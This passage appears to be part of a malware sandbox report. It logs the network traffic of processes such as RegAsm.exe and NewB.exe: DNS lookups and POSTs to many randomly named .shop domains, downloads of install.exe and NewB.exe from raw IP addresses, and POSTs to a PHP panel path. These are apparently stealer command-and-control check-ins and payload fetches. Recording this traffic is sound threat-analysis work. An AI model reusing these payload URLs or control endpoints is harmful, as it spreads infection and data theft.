                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCqcBJFPzi4qdWTqVp6B8QdXgZu5VObY0HUF8Xd2K9RXNgStk2s3myWGWMv%2FhJfFJecvO5%2FWVijSzK0kqpgN%2BLoAj51yA93F6ru2eHl8q%2B8MUkSW8rzxyU6Fx4pIZhgrxyH8X1vxWiDI3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb41ecaf954a-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://zippyfinickysofwps.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.39.216:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: zippyfinickysofwps.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:32 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=2hame4c594bbqr6ids7saedv1h; expires=Sat, 07-Sep-2024 11:48:11 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KUPDQqxMHjRjyQD7jA4GmokSn0XudCfVujhDGvDcnpgQFmJLcArizqdGJlbCroDWv%2F%2BPOiJk8hS%2FCcbzAHMwEkdPXdOUsQxxCoDf6x0pD89QwN%2F978O1t4OkYMAQa6RM5IF4OTb73l67Sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb4a4a0c954a-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      acceptabledcooeprs.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      acceptabledcooeprs.shop
                                                                                      IN A
                                                                                      Response
                                                                                      acceptabledcooeprs.shop
                                                                                      IN A
                                                                                      188.114.97.2
                                                                                      acceptabledcooeprs.shop
                                                                                      IN A
                                                                                      188.114.96.2
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://acceptabledcooeprs.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      188.114.97.2:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: acceptabledcooeprs.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:31 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=jcbauri6pn1qi47lr33ggjshkj; expires=Sat, 07-Sep-2024 11:48:10 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SfzamfhLHgTakeO4OmUvZGNPJg3oVzDWdsGMzO%2FSKyXXqFuGPsejo2Nc5F4C0tdT6mxGAd%2BnNG5iWM96lma6F38QDzugM6bm%2BSOUFSuj5Ki9WerAYdU7nZJXIi4uJqBRgAMubFT9f8jGNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb453d649430-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      216.39.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      216.39.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      2.97.114.188.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      2.97.114.188.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      33.128.172.185.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      33.128.172.185.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      obsceneclassyjuwks.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      obsceneclassyjuwks.shop
                                                                                      IN A
                                                                                      Response
                                                                                      obsceneclassyjuwks.shop
                                                                                      IN A
                                                                                      104.21.20.88
                                                                                      obsceneclassyjuwks.shop
                                                                                      IN A
                                                                                      172.67.192.5
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://obsceneclassyjuwks.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.20.88:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: obsceneclassyjuwks.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:32 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=2n9j2io74jqq3o2gfnpsrmseoa; expires=Sat, 07-Sep-2024 11:48:11 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1JMAqHWXcfqArt%2FLKpWWa0SeCjxKjNh%2F%2F8cpU27bPrksknr6mhkKlIzB08VMMVgw9mPgT%2F%2B%2Bf%2F9Y8NKLYttQgh6KWoEw10TYp9s0TfxBdB8ak%2BGh%2FD9UKA3uLyoRxbtMny47Fuqlb%2Bfpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb48bfb59565-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://77.221.151.47/install.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      77.221.151.47:80
                                                                                      Request
                                                                                      GET /install.exe HTTP/1.1
                                                                                      Host: 77.221.151.47
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Tue, 14 May 2024 18:01:32 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 4448942
                                                                                      Last-Modified: Thu, 02 May 2024 13:52:07 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "66339a87-43e2ae"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-us
                                                                                      DNS
                                                                                      miniaturefinerninewjs.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      miniaturefinerninewjs.shop
                                                                                      IN A
                                                                                      Response
                                                                                      miniaturefinerninewjs.shop
                                                                                      IN A
                                                                                      104.21.30.191
                                                                                      miniaturefinerninewjs.shop
                                                                                      IN A
                                                                                      172.67.173.139
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://miniaturefinerninewjs.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.30.191:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: miniaturefinerninewjs.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=lbrntapjt9vba1dm8mrs0vb12q; expires=Sat, 07-Sep-2024 11:48:12 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiNXIt5vnjX4iBexnMj585Se2oKlYdEibWtbfEq6JFVn3U6FmKjq7sAMvH44ckx9cVujecH4bFCJxppMY%2FFwaEx7ug9%2B9%2BMaGgd8pUcXEO0Ks1iTYZqZKsApuTVCT1u2bBgbk93HZ4nnP10o6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb4cad0f52c2-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      plaintediousidowsko.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      plaintediousidowsko.shop
                                                                                      IN A
                                                                                      Response
                                                                                      plaintediousidowsko.shop
                                                                                      IN A
                                                                                      104.21.53.146
                                                                                      plaintediousidowsko.shop
                                                                                      IN A
                                                                                      172.67.213.139
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://plaintediousidowsko.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.53.146:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: plaintediousidowsko.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=6rovv40kl83966t1lcbatbhp14; expires=Sat, 07-Sep-2024 11:48:12 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gnXep5C3vPDTKLnkHSgrcyuH7kmzQz%2F0caU1d%2FZCvfZJWEgJmGXHlwZiRE73sW33h27gI8Fi8DGNDxPaJcMzcgp%2FgOv81V7O1Pn6G%2BcCeGdUEnzkXVf7%2FnFOLFT1HCMQEZIJKMTegxRDAno%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb4f8f73732c-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      sweetsquarediaslw.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      sweetsquarediaslw.shop
                                                                                      IN A
                                                                                      Response
                                                                                      sweetsquarediaslw.shop
                                                                                      IN A
                                                                                      104.21.44.201
                                                                                      sweetsquarediaslw.shop
                                                                                      IN A
                                                                                      172.67.203.170
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://sweetsquarediaslw.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.44.201:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: sweetsquarediaslw.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=ukthujrhq0mj3ojkaf6ig8jpfo; expires=Sat, 07-Sep-2024 11:48:12 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ArxnsSZI1EKF1jD4LdDa9OWv21h3Ic6LIantNn%2BeIlR71syMjBZimyD2NvllRmj%2BUeThqEuNP0UbQ1O3B%2FMjKCggu7GEMQqCyvTpO7klm9KnWJbDgTGiQU50I2eEDqqkhtD31wy90KkO"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb525dcd94d8-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      holicisticscrarws.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      holicisticscrarws.shop
                                                                                      IN A
                                                                                      Response
                                                                                      holicisticscrarws.shop
                                                                                      IN A
                                                                                      104.21.40.92
                                                                                      holicisticscrarws.shop
                                                                                      IN A
                                                                                      172.67.183.72
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://holicisticscrarws.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.40.92:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: holicisticscrarws.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:34 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=kvks7eup6kvfg4o0tvvousbhm0; expires=Sat, 07-Sep-2024 11:48:13 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ERHbrOW%2BlYa%2B2L09YrgXCd1OzeFXW7OiWv4AXFL9Ugddu4jv5GOUxinkCA1jyAqO382vHXTSlFjUK9%2FIiPQk2oMluKO9%2Fez%2F8us6eH4bSvDMdsOJRXndG3S1b4rB1K6J2ez2gxefNrA"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb556f17731b-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      88.20.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      88.20.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      47.151.221.77.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      47.151.221.77.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      67.113.215.185.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      67.113.215.185.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      191.30.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      191.30.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      146.53.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      146.53.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      201.44.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      201.44.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      boredimperissvieos.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      boredimperissvieos.shop
                                                                                      IN A
                                                                                      Response
                                                                                      boredimperissvieos.shop
                                                                                      IN A
                                                                                      172.67.186.30
                                                                                      boredimperissvieos.shop
                                                                                      IN A
                                                                                      104.21.72.135
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://boredimperissvieos.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      172.67.186.30:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: boredimperissvieos.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:34 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=b4cd8o9jrvbe4rje2unnhbkfms; expires=Sat, 07-Sep-2024 11:48:13 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WAYd%2BUPN7UTLwrUSFUcW%2FQS0sl5c72IJ8GDP4yzHqki4CsjnrCRy0Ce3uRKw%2FEGS7CjkqwwE0uXwH11svbVk9WCXpO%2BYxaSlExspZsz7xo1upbJ42z2wVJYvt%2FcfIQVZGy1zznZL9SD4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb58489e03b9-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      92.40.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      92.40.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      30.186.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      30.186.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      26.165.165.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      26.165.165.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      206.23.85.13.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      206.23.85.13.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-de
                                                                                      GET
                                                                                      http://185.172.128.19/NewB.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      GET /NewB.exe HTTP/1.1
                                                                                      Host: 185.172.128.19
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:39 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 428544
                                                                                      Last-Modified: Thu, 09 Nov 2023 18:10:51 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "654d20ab-68a00"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-us
                                                                                      DNS
                                                                                      19.128.172.185.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      19.128.172.185.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      smallelementyjdui.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      smallelementyjdui.shop
                                                                                      IN A
                                                                                      Response
                                                                                      smallelementyjdui.shop
                                                                                      IN A
                                                                                      172.67.162.147
                                                                                      smallelementyjdui.shop
                                                                                      IN A
                                                                                      104.21.15.116
                                                                                    • flag-us
                                                                                      DNS
                                                                                      smallelementyjdui.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      smallelementyjdui.shop
                                                                                      IN A
                                                                                      Response
                                                                                      smallelementyjdui.shop
                                                                                      IN A
                                                                                      172.67.162.147
                                                                                      smallelementyjdui.shop
                                                                                      IN A
                                                                                      104.21.15.116
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://smallelementyjdui.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      172.67.162.147:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: smallelementyjdui.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=on96i0k1f6pak241p00mle24kk; expires=Sat, 07-Sep-2024 11:48:19 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JNL1fB4Ystql3r5XvZ%2BJuaxZWtUGGkHfYFUZ828iXWj15zqX5flgD4ZNVEI76hxhb2KcYWI%2Bf5YRHsqwF6h%2BYdj%2FSNwf4uxqBz5uwtnx9Bk40DFlzY2DG8WuuAEjuYzxF6AN3B2RnzU"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb7df8f623dc-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://smallelementyjdui.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      172.67.162.147:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: smallelementyjdui.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:45 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=2p4ndm8571del88mnaso46ns3r; expires=Sat, 07-Sep-2024 11:48:24 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l42gCB%2Fy3qCtJcna1Gy48nBO1%2B2saFpfhpt7kf3GCTIxh6kPjicuXGiwoYFiQjQRB9htJolSMSrof7iRZ8O4cRpnIndzcHbIAaejU4qsyVveeTqpFdcoTJ%2FXkRMHpwf%2Fxq9o7w6mfhNX"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9cfb8623dc-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 4
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 158
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
